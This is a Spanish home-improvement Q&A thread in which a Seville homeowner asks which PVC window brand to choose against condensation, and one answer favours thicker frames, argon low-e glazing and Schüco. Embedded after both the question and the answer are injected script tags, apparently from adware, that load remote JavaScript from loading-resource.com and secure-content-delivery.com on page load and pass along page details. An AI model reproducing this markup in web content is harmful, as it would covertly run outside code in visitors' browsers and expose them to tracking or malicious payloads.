¿Qué marca de ventanas PVC es mejor?

Queremos cambiar las ventanas de nuestra casa por unas de PVC.

Cada empresa que hemos consultado nos pone una marca de PVC distinta y no tenemos ni idea de cuál escoger.

Éstas son las opciones que nos dan:

* PVC Rehaus sistema S-799 Brillant con cajón Cadesingplus de 155 con cuña aislante; marco 76-70 ; hoja de 60/80 redonda y vidrio 4:16:4 con argón.

* PVC Sumun Zendow con cajón de 185 y vidrio 4:16:4 bajo emisivo.

* PVC Kömmerling Eurodor, persiana monobloc y vidrio 4:16:4 solar.

Residimos en Sevilla y queremos evitar la alta condensación que se forma en casa en invierno.

Por favor, si puede darnos un poco de información que nos ayude a entender lo que nos ofrecen, se lo agradeceríamos. Gracias de antemano.

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://loading-resource.com/data.js.php?i={4F840D60-A745-47DD-8B62-3E9F38AB652C}&d=2012-11-9&s=http://www.todoexpertos.com/mitodoexpertos/ask/expert/rizopvck/path/casa-y-jardin/carpinteria"></script>

1 respuesta

Respuesta

En primer lugar, felicitarle por elegir PVC, ya que es el material que mejores prestaciones le va a ofrecer. Una vez dicho esto, conociendo las carpinterías, me decantaría por la de mayor sección, es decir, la que mayor espesor tenga. Dentro de los vidrios, lo ideal es hace un "mix", colocarle gas argón y ademas el tratamiento de baja emisividad, para conseguir el mejor aislamiento térmico.

Por otro lado, me gustaría recomendarle la carpintería de PVC de Schüco, es un fabricante líder a nivel mundial y le pueden ofrecer productos de un altísimo aislamiento.

<div id="__tbSetup"> </div><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={4F840D60-A745-47DD-8B62-3E9F38AB652C}&d=2012-11-9&s=http://www.todoexpertos.com/mitodoexpertos/question/6os85ezypb74n/que-marca-de-ventanas-pvc-es-mejor?utm_source=AnswerNew&utm_medium=Email&utm_campaign=AnswerNew"></script>